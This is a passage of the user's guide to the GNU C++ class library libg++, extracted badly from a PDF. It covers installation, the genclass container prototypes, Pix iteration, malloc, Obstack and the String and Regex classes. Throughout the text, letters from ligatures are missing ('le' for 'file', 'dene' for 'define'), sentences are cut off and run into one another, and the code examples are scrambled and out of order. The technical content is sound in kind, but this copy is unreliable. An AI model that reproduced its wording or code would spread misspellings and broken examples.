denitions.) b. Accompany the work with a written oer, valid for at least three years, to give the same user the materials specied in Subsection 6a, above, for a charge no more than the cost of performing this distribution. c. If distribution of the work is made by oering access to copy from a designated place, oer equivalent access to copy the above specied nd 6 User's Guide to the GNU C++ Class Library 10. 11. 12. 13. 14. Library General Public License from time to time. Such new versions will be similar in spirit to the present version, but may dier in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library species wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software GNU LIBRARY GENERAL PUBLIC LICENSE 7 8 User's Guide to the GNU C++ Class Library le to most eectively convey the exclusion of warranty; and each le but WITHOUT ANY MERCHANTABILITY Library General distributed in the hope that it will be useful, WARRANTY; without even the implied warranty of or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Public License for more details.. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. signature of Ty Coon, That's all there is to it! 1 April 1990 Ty Coon, President of Vice Contributors to GNU C++ library 9 Contributors to GNU C++ library Aside from Michael Tiemann, who worked out the front end for GNU C++, and Richard Stallman, who worked out the back end, the following people (not including those who have made their contributions to GNU CC) should not go unmentioned. Doug Lea contributed most otherwise unattributed classes. Per Bothner contributed the iostream I/O classes. Dirk Grunwald contributed the Random number generation classes, and PairingHeaps. Kurt Baudendistel contributed Fixed precision reals. Doug Schmidt contributed ordered hash tables, a perfect hash function generator, and several other utilities. Marc Shapiro contributed the ideas and preliminary code for Plexes. Eric Newton contributed the curses window classes. Some of the I/O code is derived from BSD 4.4, and was developed by the University of California, Berkeley. The code for converting accurately between oating point numbers and their string representations was written by David M. Gay of AT&T. 10 User's Guide to the GNU C++ Class Library Chapter 1: Installing GNU C++ library 11 1 Installing GNU C++ library 1. Read through the README le and the Makele. Make sure that all paths, system-dependent compile switches, and program names are correct. 2. Check that les `values.h', `stdio.h', and `math.h' declare and dene values appropriate for your system. 3. Type `make all' to compile the library, test, and install. Current details about contents of the tests and utilities are in the `README' le. 12 User's Guide to the GNU C++ Class Library Chapter 2: Trouble in Installation 13 2 Trouble in Installation Here are some of the things that have caused trouble for people installing GNU C++ library. 1. Make sure that your GNU C++ version number is at least as high as your libg++ version number. For example, libg++ 1.22.0 requires g++ 1.22.0 or later releases. 2. Double-check system constants in the header les mentioned above. 14 User's Guide to the GNU C++ Class Library Chapter 3: GNU C++ library aims, objectives, and limitations 15 3 GNU C++ library aims, objectives, and limitations The GNU C++ library, libg++ is an attempt to provide a variety of C++ programming tools and other support to GNU C++ programmers. Dierences in distribution policy are only part of the dierence between libg++.a and AT&T libC.a. libg++ is not intended to be an exact clone of libC. For one, libg++ contains bits of code that depend on special features of GNU g++ that are either dierent or lacking in the AT&T version, including slightly dierent inlining and overloading strategies, dynamic local arrays, etc. All of these dierences are minor. For example, while the AT&T and GNU stream classes are implemented in very dierent ways, the vast majority of C++ programs compile and run under either version with no visible dierence. Additionally, all g++-specic rst kind of support provides an interface between C++ programs and C libraries. This includes basic header les (like `stdio.h') as well as things like the File and stream classes. Other classes that interface to other aspects of C libraries (like those that maintain environmental information) are in various stages of development; all will undergo implementation modications les are available as a mechanism for generating common container classes. These are described in more detail in the introduction to container prototypes. Currently, only a textual substitution mechanism is available for generic class creation. 16 User's Guide to the GNU C++ Class Library Chapter 4: GNU C++ library stylistic conventions 17 4 GNU C++ library stylistic conventions C++ source les have le extension `.cc'. Both C-compatibility header les and class declaration les have extension `.h'. C++ class names begin with capital letters, except for istream and ostream, for AT&T C++ compatibility. Multi-word class names capitalize each word, with no underscore separation. Include les that dene C++ classes begin with capital letters (as do the names of the classes themselves). `stream.h' is uncapitalized for AT&T C++ compatibility. Include les that supply function prototypes for other C functions (system calls and libraries) are all lower case. All include les dene a preprocessor variable X h, where X is the name of the le, and conditionally compile only if this has not been already dened. The #pragma once facility is also used to avoid re-inclusion. Structures and objects that must be publicly dened, but are not intended for public use have names beginning with an underscore. (for example, the _Srep struct, which is used only by the String and SubString classes.) The underscore is used to separate components of long function names, e.g., set_File_exception_handler(). When a function could be usefully dened either as a member or a friend, it is generally a member if it modies and/or returns itself, else it is a friend. There are cases where naturalness of expression wins out over this rule. Class declaration les are formatted so that it is easy to quickly check them to determine function names, parameters, and so on. Because of the dierent kinds of things that may appear in class declarations, there is no perfect way to do this. Any suggestions on developing a common class declaration formatting style are welcome. All classes use the same simple error (exception) handling strategy. Almost every class has a member function named error(char* msg) that invokes an associated error handler function via a pointer to that function, so that the error handling function may be reset by programmers. By default nearly all call *lib_error_handler, which prints the message and then aborts execution. This system is subject to change. In general, errors are assumed to be non-recoverable: Library classes do not include code that allows graceful continuation after exceptions. 18 User's Guide to the GNU C++ Class Library Chapter 5: Support for representation invariants 19 5 Support for representation invariants Most GNU C++ library classes possess a method named OK(), that is useful in helping to verify correct performance of class operations. The OK() operations checks the \representation invariant" of a class object. This is a test to check whether the object is in a valid state. In eect, it is a (sometimes partial) verication of the library's promise that (1) class operations always leave objects in valid states, and (2) the class protects itself so that client functions cannot corrupt this state. While no simple validation technique can assure that all operations perform correctly, calls to OK() can at least verify that operations do not corrupt representations. For example for String a, b, c; ... a = b + c;, a call to a.OK(); will guarantee that a is a valid String, but does not guarantee that it contains the concatenation of b + c. However, given that a is known to be valid, it is possible to further verify its properties, for example via a.after(b) == c && a.before(c) == b. In other words, OK() generally checks only those internal representation properties that are otherwise inaccessible to users of the class. Other class operations are often useful for further validation. Failed calls to OK() call a class's error method if one exists, else directly call abort. Failure indicates an implementation error that should be reported. With only rare exceptions, the internal support functions for a class never themselves call OK() (although many of the test les in the distribution call OK() extensively). Verication of representational invariants can sometimes be very time consuming for complicated data structures. 20 User's Guide to the GNU C++ Class Library Chapter 6: Introduction to container class prototypes 21 6 Introduction to container class prototypes As a temporary mechanism enabling the support of generic classes, the GNU C++ Library distribution contains a directory (`g++-include') of les designed to serve as the basis for generating container classes of specied elements. These les can be used to generate `.h' and `.cc' les in the current directory via a supplied shell script program that performs simple textual substitution to create specic classes. While these classes are generated independently, and thus share no code, it is possible to create versions that do share code among subclasses. For example, using typedef void* ent, and then generating a entList class, other derived classes could be created using the void* coercion method described in Stroustrup, pp204-210. This very simple class-generation facility is useful enough to serve current purposes, but will be replaced with a more coherent mechanism for handling C++ generics in a way that minimally disrupts current usage. Without knowing exactly when or how parametric classes might be added to the C++ language, provision of this simplest possible mechanism, textual substitution, appears to be the safest strategy, although it does require certain redundancies and awkward constructions. Specic classes may be generated via the `genclass' shell script program. This program has arguments specifying the kinds of base types(s) to be used. Specifying base types requires two arguments. The rst is the name of the base type, which may be any named type, like int or String. Only named types are supported; things like int* are not accepted. However, pointers like this may be used by supplying the appropriate typedefs (e.g., editing the resulting les to include typedef int* intp;). The type name must be followed by one of the words val or ref, to indicate whether the base elements should be passed to functions by-value or by-reference. You can specify basic container classes using genclass base [val,ref] proto, where proto is the name of the class being generated. Container classes like dictionaries and maps that require two types may be specied via genclass -2 keytype [val, ref], basetype [val, ref] proto, where the key type is specied rst and the contents type second. The resulting classnames and lenames are generated by prepending the specied type names to the prototype names, and separating the lename parts with dots. For example, genclass int val List generates class intList residing in les `int.List.h' and `int.List.cc'. genclass -2 String ref int val VHMap generates (the awkward, but unavoidable) class name StringintVHMap. Of course, programmers may use typedef or simple editing to create more appropriate names. The existence of dot seperators in le names allows the use of GNU make to help automate conguration and recompilation. An example Makele exploiting such capabilities may be found in the `libg++/proto-kit' directory. The genclass utility operates via simple text substitution using sed. All occurrences of the pseudo-types <T> and <C> (if there are two types) are replaced with the indicated type, and occurrences of <T&> and <C&> are replaced by just the types, if val is specied, or types followed by \&" if ref is specied. Programmers will frequently need to edit the `.h' le in order to insert additional #include directives or other modications. A simple utility, `prepend-header' to prepend other `.h' les to generated les is provided in the distribution. One dubious virtue of the prototyping mechanism is that, because sources les, not archived library classes, are generated, it is relatively simple for programmers to modify container classes in the common case where slight variations of standard container classes are required. 22 User's Guide to the GNU C++ Class Library It is often a good idea for programmers to archive (via ar) generated classes into `.a' les so that only those class functions actually used in a given application will be loaded. The test subdirectory of the distribution shows an example of this. Because of #pragma interface directives, the `.cc' les should be compiled with -O or -DUSE_ LIBGXX_INLINES enabled. Many container classes require specications over and above the base class type. For example, classes that maintain some kind of ordering of elements require specication of a comparison function upon which to base the ordering. This is accomplished via a prototype le `defs.hP' that contains macros for these functions. While these macros default to perform reasonable actions, they can and should be changed in particular cases. Most prototypes require only one or a few of these. No harm is done if unused macros are dened to perform nonsensical actions. The macros are: DEFAULT_INITIAL_CAPACITY The initial capacity for containers (e.g., hash tables) that require an initial capacity argument for constructors. Default: 100 return true if a is considered equal to b for the purposes of locating, etc., an element in a container. Default: (a == b) return true if a is less than or equal to b Default: (a <= b) return an integer < 0 if a<b, 0 if a==b, or > 0 if a>b. Default: (a <= b)? (a==b)? 0 : -1 : 1 <T>EQ(a, b) <T>LE(a, b) <T>CMP(a, b) <T>HASH(a) return an unsigned integer representing the hash of a. Default: hash(a) ; where extern unsigned int hash(<T&>). (note: several useful hash functions are declared in builtin.h and dened in hash.cc) Nearly all prototypes container classes support container traversal via Pix pseudo indices, as described elsewhere. All object containers must perform either a X::X(X&) (or X::X() followed by X::operator =(X&)) to copy objects into containers. (The latter form is used for containers built from C++ arrays, like VHSets). When containers are destroyed, they invoke X::~X(). Any objects used in containers must have well behaved constructors and destructors. If you want to create containers that merely reference (point to) objects that reside elsewhere, and are not copied or destroyed inside the container, you must use containers of pointers, not containers of objects. All prototypes are designed to generate HOMOGENOUS container classes. There is no universally applicable method in C++ to support heterogenous object collections with elements of various subclasses of some specied base class. The only way to get heterogenous structures is to use collections of pointers-to-objects, not collections of objects (which also requires you to take responsibility for managing storage for the objects pointed to yourself). For example, the following usage illustrates a commonly encountered danger in trying to use container classes for heterogenous structures: Chapter 6: Introduction to container class prototypes 23 class Base { int x; ...} class Derived : public Base { int y; ... } BaseVHSet s; // class BaseVHSet generated via something like // `genclass Base ref VHSet' void f() { Base b; s.add(b); // OK Derived d; s.add(d); // (CHOP!) At the line agged with `(CHOP!)', a Base::Base(Base&) is called inside Set::add(Base&)|not Derived::Derived(Derived&). Actually, in VHSet, a Base::operator =(Base&), is used instead to place the element in an array slot, but with the same eect. So only the Base part is copied as a VHSet element (a so-called chopped-copy). In this case, it has an x part, but no y part; and a Base, not Derived, vtable. Objects formed via chopped copies are rarely sensible. To avoid this, you must resort to pointers: typedef Base* BasePtr; BasePtrVHSet s; // class BaseVHSet generated via something like // `genclass BasePtr val VHSet' void f() { Base* bp = new Base; s.add(b); Base* dp = new Derived; s.add(d); // works fine. // Don't forget to delete bp and dp sometime. // The VHSet won't do this for you. } } 6.1 Example The prototypes can be dicult to use on rst attempt. Here is an example that may be helpful. The utilities in the `proto-kit' simplify much of the actions described, but are not used here. Suppose you create a class Person, and want to make an Map that links the social security numbers associated with each person. You start o with a le `Person.h' #include <String.h> class Person 24 User's Guide to the GNU C++ Class Library { String nm; String addr; //... public: const String& name() { return nm; } const String& address() { return addr; } void print() { ... } //... } And in le `SSN.h', Your rst decision is what storage/usage strategy to use. There are several reasonable alternatives here: You might create an \object collection" of Persons, a \pointer collection" of pointersto-Persons, or even a simple String map, housing either copies of pointers to the names of Persons, since other elds are unused for purposes of the Map. In an object collection, instances of class Person \live" inside the Map, while in a pointer collection, the instances live elsewhere. Also, as above, if instances of subclasses of Person are to be used inside the Map, you must use pointers. In a String Map, the same dierence holds, but now only for the name elds. Any of these choices might make sense in particular applications. The second choice is the Map implementation strategy. Either a tree or a hash table might make sense. Suppose you want an AVL tree Map. There are two things to now check. First, as an object collection, the AVLMap requires that the elsement class contain an X(X&) constructor. In C++, if you don't specify such a constructor, one is constructed for you, but it is a very good idea to always do this yourself, to avoid surprises. In this example, you'd use something like class Person { ...; Person(const Person& p) :nm(p.nm), addr(p.addr) {} }; typedef unsigned int SSN; Also, an AVLMap requires a comparison function for elements in order to maintain order. Rather than requiring you to write a particular comparison function, a `defs' le is consulted to determine how to compare items. You must create and edit such a le. Before creating `Person.defs.h', you must rst make one additional decision. Should the Map member functions like m.contains(p) take arguments (p) by reference (i.e., typed as int Map::contains(const Person& p) or by value (i.e., typed as int Map::contains(const Person p). Generally, for user-dened classes, you want to pass by reference, and for builtins and pointers, to pass by value. SO you should pick by-reference. You can now create `Person.defs.h' via genclass Person ref defs. This creates a simple skeleton that you must edit. First, add #include "Person.h" to the top. Second, edit the <T>CMP(a,b) macro to compare on name, via which invokes the int compare(const String&, const String&) function from `String.h'. Of course, you could dene this in any other way as well. In fact, the default versions in the skeleton turn out to be OK (albeit inecient) in this particular example. #define <T>CMP(a, b) ( compare(a.name(), b.name()) ) Chapter 6: Introduction to container class prototypes 25 You may also want to create le `SSN.defs.h'. Here, choosing call-by-value makes sense, and since no other capabilities (like comparison functions) of the SSNs are used (and the defaults are OK anyway), you'd type and then edit to place #include "SSN.h" at the top. Finally, you can generate the classes. First, generate the base class for Maps via This generates only the abstract class, not the implementation, in le `Person.SSN.Map.h' and `Person.SSN.Map.cc'. To create the AVL implementation, type This creates the class PersonSSNAVLMap, in `Person.SSN.AVLMap.h' and `Person.SSN.AVLMap.cc'. To use the AVL implementation, compile the two generated `.cc' les, and specify `#include "Person.SSN.AVLMap.h"' in the application program. All other les are included in the right ways automatically. One last consideration, peculiar to Maps, is to pick a reasonable default contents when declaring an AVLMap. Zero might be appropriate here, so you might declare a Map, Suppose you wanted a VHMap instead of an AVLMap Besides generating dierent implementations, there are two dierences in how you should prepare the `defs' le. First, because a VHMap uses a C++ array internally, and because C++ array slots are initialized dierently than single elements, you must ensure that class Person contains (1) a no-argument constructor, and (2) an assignment operator. You could arrange this via class Person { ...; Person() {} void operator = (const Person& p) { nm = p.nm; addr = p.addr; } }; PersonSSNAVLMap m((SSN)0); genclass -2 Person ref SSN val AVLMap genclass -2 Person ref SSN val Map genclass SSN val defs (The lack of action in the constructor is OK here because Strings possess usable no-argument constructors.) You also need to edit `Person.defs.h' to indicate a usable hash function and default capacity, via something like Since the hashpjw function from `builtin.h' is appropriate here. Changing the default capacity to a value expected to exceed the actual capacity helps to avoid \hidden" ineciencies when a new VHMap is created without overriding the default, which is all too easy to do. Otherwise, everything is the same as above, substituting VHMap for AVLMap. #include <builtin.h> #define <T>HASH(x) (hashpjw(x.name().chars())) #define DEFAULT_INITIAL_CAPACITY 1000 26 User's Guide to the GNU C++ Class Library Chapter 7: Variable-Sized Object Representation 27 7 Variable-Sized Object Representation One of the rst goals of the GNU C++ library is to enrich the kinds of basic classes that may be considered as (nearly) \built into" C++. A good deal of the inspiration for these eorts is derived from considering features of other type-rich languages, particularly Common Lisp and Scheme. The general characteristics of most class and friend operators and functions supported by these classes has been heavily in uenced by such languages. Four of these types, Strings, Integers, BitSets, and BitStrings (as well as associated and/or derived classes) require representations suitable for managing variable-sized objects on the freestore. The basic technique used for all of these is the same, although various details necessarily dier ecient operations. Eciency wins out over parsimony here, as part of the goal to produce classes that provide sucient functionality and eciency so that programmers are not tempted to try to manipulate or bypass the underlying representations. 28 User's Guide to the GNU C++ Class Library Chapter 8: Some guidelines for using expression-oriented classes 29 8 Some guidelines for using expression-oriented classes The fact that C++ allows operators to be overloaded for user-dened nally copied into c, and the temporaries are then deleted. In other words, this code might have an eect similar to Integer a, b, c; ...; Integer t1(a); t1 += b; Integer t2(t1); t2 += a; c = t2;. For small objects, simple operators, and/or non-time/space critical programs, creation of temporaries is not a big problem. However, often, when ne-tuning a program, it may be a good idea to rewrite such code in a less pleasant, but more ecient manner. For builtin types like ints, and oats, C and C++ compilers already know how to optimize such expressions to reduce the need for temporaries. Unfortunately, this is not true for C++ user dened exibility,; a); div(a, c, a); But, with some manual cleverness, you might yourself some up with sub(a, b, a); mul(a, 30 User's Guide to the GNU C++ Class Library to manipulate the returned object directly, rather than requiring you to create a local inside a function and then copy it out as the returned value. In this example, this can be done via Integer f(const Integer& a) return r(a) { r += a; return; } A nal guideline: The overloaded operators are very convenient, and much clearer to use than procedural code. It is almost always a good idea to make it right, then make it fast, by translating expression code into procedural code after it is known to be correct. Chapter 9: Pseudo-indexes 31 9 Pseudo-indexes Many useful classes operate as containers of elements. Techniques for accessing these elements from a container dier from class to class. In the GNU C++ library, access methods have been partially standardized across dierent classes via the use of pseudo-indexes called Pixes. A Pix acts in some ways like an index, and in some ways like a pointer. (Their underlying representations are just void* pointers). A Pix is a kind of \key" that is translated into an element access by the class. In virtually all cases, Pixes are pointers to some kind internal storage cells. The containers use these pointers to extract items. Pixes support traversal and inspection of elements in a collection using analogs of array indexing. However, they are pointer-like in that 0 is treated as an invalid Pix, and unsafe insofar as programmers can attempt to access nonexistent elements via dangling or otherwise invalid Pixes without rst checking for their validity. In general it is a very bad idea to perform traversals in the the midst of destructive modications to containers. Typical applications might include code using the idiom for some container a and function use. Classes supporting the use of Pixes always contain the following methods, assuming a container a of element types of Base. Pix i = a.first() a.next(i) for (Pix i = a.first(); i != 0; a.next(i)) use(a(i)); Set i to index the rst element of a or 0 if a is empty. advance i to the next element of a or 0 if there is no next element; a(i) returns a reference to the element indexed by i. Base x = a(i); a(i) = x; int present = a.owns(i) returns true if Pix i is a valid Pix in a. This is often a relatively slow operation, since the collection must usually traverse through elements to see if any correspond to the Pix. Some container classes also support backwards traversal via Set i to the last element of a or 0 if a is empty. Pix i = a.last() a.prev(i) sets i to the previous element in a, or 0 if there is none. Collections supporting elements with an equality operation possess sets j to the index of the rst occurrence of x, or 0 if x is not contained in a. Bag classes possess sets j to the index of the next occurrence of x following i, or 0 if x is not contained in a. If i == 0, the rst occurrence is returned. Pix j = a.seek(x) Pix j = a.seek(x, Pix from = 0) 32 User's Guide to the GNU C++ Class Library Set, Bag, and PQ classes possess Pix j = a.add(x) (or a.enq(x) for priority queues) add x to the collection, returning its Pix. The Pix of an item can change in collections where further additions and deletions involve the actual movement of elements (currently in OXPSet, OXPBag, XPPQ, VOHSet), but in all other cases, an item's Pix may be considered a permanent key to its location. Chapter 10: Header les for interfacing C++ to C 33 10 Header les for interfacing C++ to C The following les are provided so that C++ programmers may invoke common C library and system calls. The names and contents of these les are subject to change in order to be compatible with the forthcoming GNU C library. Other les, not listed here, are simply C++-compatible interfaces to corresponding C library les. `values.h' A collection of constants dening the numbers of bits in builtin types, minimum and maximum values, and the like. Most names are the same as those found in `values.h' found on Sun systems. `std.h' A collection of common system calls and `libc.a' functions. Only those functions that can be declared without introducing new type denitions (socket structures, for example) are provided. Common char* functions (like strcmp) are among the declarations. All functions are declared along with their library names, so that they may be safely overloaded. `string.h' This le merely includes `<std.h>', where string function prototypes are declared. This is a workaround for the fact that system `string.h' and `strings.h' les often dier in contents. `osfcn.h' This le merely includes `<std.h>', where system function prototypes are declared. `libc.h' This le merely includes `<std.h>', where C library function prototypes are declared. `math.h' A collection of prototypes for functions usually found in libm.a, plus some #defined constants that appear to be consistent with those provided in the AT&T version. The value of HUGE should be checked before using. Declarations of all common math functions are preceded with overload declarations, since these are commonly overloaded. `stdio.h' Declaration of FILE (_iobuf), common macros (like getc), and function prototypes for `libc.a' functions that operate on FILE*'s. The value BUFSIZ and the declaration of _iobuf should be checked before using. `assert.h' C++ versions of assert macros. `generic.h' String concatenation macros useful in creating generic classes. They are similar in function to the AT&T CC versions. `new.h' Declarations of the default global operator new, the two-argument placement version, and associated error handlers. 34 User's Guide to the GNU C++ Class Library Chapter 11: Utility functions for built in types 35 11 Utility functions for built in types Files `builtin.h' and corresponding `.cc' implementation les contain various convenient inline and non-inline utility functions. These include useful enumeration types, such as TRUE, FALSE ,the type denition for pointers to libg++ error handling functions, and the following functions. long abs(long x); double abs(double x); inline versions of abs. Note that the standard libc.a version, declared as inline. clears the b'th bit of x (inline). sets the b'th bit of x (inline) returns the b'th bit of x (inline). returns true if x is even (inline). returns true is x is odd (inline). int abs(int) is not void clearbit(long& x, long b); void setbit(long& x, long b); int testbit(long x, long b); int even(long y); int odd(long y); int sign(long x); int sign(double x); returns -1, 0, or 1, indicating whether x is less than, equal to, or greater than zero (inline). returns the greatest common divisor of x and y. returns the least common multiple of x and y. long gcd(long x, long y); long lcm(long x, long y); long lg(long x); returns the oor of the base 2 log of x. returns x to the integer power y using via the iterative O(log y) \Russian peasant" method. returns x squared (inline). long pow(long x, long y); double pow(double x, long y); long sqr(long x); double sqr(double x); long sqrt(long y); returns the oor of the square root of x. a hash function for null-terminated char* strings using the method described in Aho, Sethi, & Ullman, p 436. unsigned int hashpjw(const char* s); unsigned int multiplicativehash(int x); a hash function for integers that returns the lower bits of multiplying x by the golden ratio times pow(2, 32). See Knuth, Vol 3, p 508. 36 User's Guide to the GNU C++ Class Library unsigned int foldhash(double x); a hash function for doubles that exclusive-or's the rst and second words of x, returning the result as an integer. Starts a process timer. double start_timer() double return_elapsed_time(double last_time) Returns the process time since last time. If last time == 0 returns the time since the last start timer. Returns -1 if start timer was not rst called. File `Maxima.h' includes versions of MAX, MIN for builtin types. File `compare.h' includes versions of compare(x, y) for builtin types. These return negative if the rst argument is less than the second, zero for equal, and positive for greater. Chapter 12: Library dynamic allocation primitives 37 12 Library dynamic allocation primitives Libg++ contains versions of malloc, free, realloc that were designed to be well-tuned to C++ applications. The source le `malloc.c' contains some design and implementation details. Here are the major user-visible dierences from most system malloc routines: 1. These routines overwrite storage of freed space. This means that it is never permissible to use a delete'd object in any way. Doing so will either result in trapped fatal errors or random aborts within malloc, free, or realloc. 2. The routines tend to perform well when a large number of objects of the same size are allocated and freed. You may nd that it is not worth it to create your own special allocation schemes in such cases. 3. The library sets top-level operator new() to call malloc and operator delete() to call free. Of course, you may override these denitions in C++ programs by creating your own operators that will take precedence over the library versions. However, if you do so, be sure to dene both operator new() and operator delete(). 4. These routines do not support the odd convention, maintained by some versions of malloc, that you may call realloc with a pointer that has been free'd. 5. The routines automatically perform simple checks on free'd pointers that can often determine whether users have accidentally written beyond the boundaries of allocated space, resulting in a fatal error. 6. The function malloc_usable_size(void* p) returns the number of bytes actually allocated for p. For a valid pointer (i.e., one that has been malloc'd or realloc'd but not yet free'd) this will return a number greater than or equal to the requested size, else it will normally return 0. Unfortunately, a non-zero return can not be an absolutely perfect indication of lack of error. If a chunk has been free'd but then re-allocated for a dierent purpose somewhere elsewhere, then malloc_usable_size will return non-zero. Despite this, the function can be very valuable for performing run-time consistency checks. 7. malloc requires 8 bytes of overhead per allocated chunk, plus a mmaximum alignment adjustment of 8 bytes. The number of bytes of usable space is exactly as requested, rounded to the nearest 8 byte boundary. 8. The routines do not contain any synchronization support for multiprocessing. If you perform global allocation on a shared memory multiprocessor, you should disable compilation and use of libg++ malloc in the distribution `Makefile' and use your system version of malloc. 38 User's Guide to the GNU C++ Class Library Chapter 13: The new input/output classes 39 13 The new input/output classes. 40 User's Guide to the GNU C++ Class Library Chapter 14: The old I/O library 41 14 The old I/O library WARNING: This chapter describes classes that are obsolete. These classes are normally not available when libg++ is installed normally. The sources are currently included in the distribution, and you can congure). 14.1 File-based classes The File class supports basic IO on Unix les. Operations are based on common C stdio library functions. File serves as the base class for istreams, ostreams, and other derived classes. It contains the interface between the Unix stdio le library and these more structured classes. Most operations are implemented as simple calls to stdio functions. File class operations are also fully compatible with raw system le reads and writes (like the system read and lseek calls) when buering is disabled (see below). The FILE* stdio le pointer is, however maintained as protected. Classes derived from File may only use the IO operations provided by File, which encompass essentially all stdio capabilities. The class contains four general kinds of functions: methods for binding Files to physical Unix les, basic IO methods, le and buer control methods, and methods for maintaining logical and physical le status. Binding and related tasks are accomplished via File constructors and destructors, and member functions open, close, remove, filedesc, name, setname. If a le name is provided in a constructor or open, it is maintained as class variable nm and is accessible via name. If no name is provided, then nm remains null, except that Files bound to the default les stdin, stdout, and stderr are automatically given the names (stdin), (stdout), (stderr) respectively. The function setname may be used to change the internal name of the File. This does not change the name of the physical le bound to the File. The member function close closes a le. The ~File destructor closes a le if it is open, except that stdin, stdout, and stderr are ushed but left open for the system to close on program exit since some systems may require this, and on others it does not matter. remove closes the le, and then deletes it if possible by calling the system function to delete the le with the name provided in the nm eld. 14.2 Basic IO read and write perform binary IO via stdio fread and fwrite. get and put for chars invoke stdio getc and putc macros. put(const char* s) outputs a null-terminated string via stdio fputs. unget and putback are synonyms. Both call stdio ungetc. 42 User's Guide to the GNU C++ Class Library 14.3 File Control and tell call the corresponding stdio functions. flush(char) and fill() call stdio _flsbuf and _filbuf respectively. setbuf is mainly useful to turn o bu le descriptors. setbuf should be called at most once after a constructor or open, but before any IO. flush, seek, tell, 14.4 File Status File status is maintained in several ways. A File may be checked for accessibility via is_open(), which returns true if the File is bound to a usable physical le, ags) le. Therefore, _eof is not immediately true after the last successful read of a le, but only after one nal read attempt. Thus, for input operations, _fail and _eof almost always become true at the same time. bad is set for unbound les, and may also be set by applications in order to communicate input corruption. Conversely, _good is dened as 0 and is returned by rdstate() if all is well. The state may be modied via clear(flag), which, despite its name, sets the corresponding state value ag. clear() with no arguments resets the state to _good. failif(int cond) sets the state to _fail only if cond is true. Errors occuring during constructors and le-dened error handlers can be selected via the non-member function set_File_error_handler. Chapter 14: The old I/O library 43 All read and write operations communicate either logical or physical failure by setting the _fail ag. diers signicantly. 44 User's Guide to the GNU C++ Class Library Chapter 15: The Obstack class 45 15 The Obstack class les demonstrates usage. A brief summary: grow places something on the obstack without committing to wrap it up as a single entity yet. finish wraps up a constructed object as a single entity, and returns the pointer to its start address. copy places things on the obstack, and does wrap them up. copy is always equivalent to rst grow, then nish. free deletes something, and anything else put on the obstack since its creation. The other functions are less commonly needed: blank is like grow, except it just grows the space by size units without placing anything into this space alloc is like blank, but it wraps up the object and returns its starting address. chunk_size, base, next_free, alignment_mask, size, room returns the appropriate class variables. grow_fast blank_fast places a character on the obstack without checking if there is enough room. like blank, but without checking if there is enough room. shrink the current chunk by n bytes. shrink(int n) contains(void* addr) returns true if the Obstack holds the address \nished" it never changes address again. So the \top of the stack" is typically an immature growing object, while the rest of the stack is of mature, xed size and xed address objects. These routines grab large chunks of memory, using the GNU C++ new operator. On occasion, they free chunks, via delete. Each independent stack is represented by a Obstack. 46 User's Guide to the GNU C++ Class Library buer, realloc()ating the buer every time you try to read a symbol that is longer than the buer. This is beaut, but you still will want to copy the symbol from the buer to a more permanent symbol-table entry say about half the time. With obstacks, you can work dierently. Use one obstack for all symbol names. As you read a symbol, grow the name in the obstack gradually. When the name is complete, nal nished shued..) The obstack data structure is used in many places in the GNU C++ compiler. Dierences from the the GNU C version 1. The obvious dierences stemming from the use of classes and inline functions instead of structs and macros. The C init and begin macros are replaced by constructors. 2. Overloaded function names are used for grow (and others), rather than the C grow, grow0, etc. 3. All dynamic allocation uses the the built-in new operator. This restricts exibility by a little, but maintains compatibility with usual C++ conventions. Chapter 15: The Obstack class 47 4. There are now two versions of nish: 1. nish() behaves like the C version. 2. nish(char terminator) adds terminator, and then calls finish(). This enables the normal invocation of finish(0) to wrap up a string being grown character-by-character. 5. There are special versions of grow(const char* s) and copy(const char* s) that add the nullterminated string s after computing its length. 6. The shrink and contains functions are provided. 48 User's Guide to the GNU C++ Class Library Chapter 16: The AllocRing class 49 16 The AllocRing class An AllocRing is a bounded ring (circular list), each of whose elements contains a pointer to some space allocated via new char[some_size]. The entries are used cyclicly. The size, n, of the ring is xed) constructs an Alloc ring with n entries, all null. void* mem = a.alloc(sz) moves the ring pointer to the next entry, and reuses the space if their is enough, also allocates space via new char[sz]. returns true if ptr is held in one of the ring entries. deletes all space pointed to in any entry. This is called automatically upon destruction. If ptr is one of the entries, calls delete of the pointer, and resets to entry pointer to null. int present = a.contains(void* ptr) a.clear() a.free(void* ptr) 50 User's Guide to the GNU C++ Class Library Chapter 17: The String class 51 17 The String class The String class is designed to extend GNU C++ to support string processing capabilities similar to those in languages like Awk. The class provides facilities that ought to be convenient and ecient enough to be useful replacements for char* based processing via the C string library (i.e., strcpy, strcmp, etc.) in many applications. Many details about String representations are described in the Representation section. A separate SubString class supports substring extraction and modication. See section \Syntax of Regular Expressions" in GNU Emacs Manual, for a full explanation of regular expression syntax. (For implementation details, see the internal documentation in les `regex.h' and `regex.c'.) 17.1 Constructors Strings are initialized and assigned as in the following examples: String x; String y = 0; String z = ""; Set x, y, and z to the nil string. Note that either 0 or "" may always be used to refer to the nil string. Set x and y to a copy of the string "Hello". Set x and y to the string value "A" Set u and v to the same string as String x Set u and v to the length 4 substring of x starting at position 1 (counting indexes from 0). i.e., the rst 2 characters of "abc". As here, Strings may be initialized or assigned the results of any char* String x = "Hello"; String y("Hello"); String x = 'A'; String y('A'); String u = x; String v(x); String u = x.at(1,4); String v(x.at(1,4)); String x("abc", 2); Sets x to "ab", String x = dec(20); Sets x to "20". function. There are no directly accessible forms for declaring SubString variables. The declaration Regex r("[a-zA-Z_][a-zA-Z0-9_]*"); creates a compiled regular expression suitable for use in String operations described below. (In this case, one that matches any C++ identier). The rst 52 User's Guide to the GNU C++ Class Library. This is an estimate of the size of the internal compiled expression. Set it to a larger value if you know that the expression will require a lot of space. If you do not know, do not worry: realloc is used if necessary. The address of a byte translation table (a char[256]) that translates each character before matching. bufsize (default max(40, length of the string)) transtable (default none == 0) As a convenience, several Regexes are predened and usable in any program. Here are their declarations from `String.h'. extern Regex RXwhite; extern Regex RXint; extern Regex RXdouble; // // // // // // RXalpha; // RXlowercase; // RXuppercase; // RXalphanum; // RXidentifier; // = "[ \n\t]+" = "-?[0-9]+" = "-?\\(\\([0-9]+\\.[0-9]*\\)\\| \\([0-9]+\\)\\| \\(\\.[0-9]+\\)\\) \\([eE][---+]?[0-9]+\\)?" = "[A-Za-z]+" = "[a-z]+" = "[A-Z]+" = "[0-9A-Za-z]+" = "[A-Za-z_][A-Za-z0-9_]*" extern extern extern extern extern 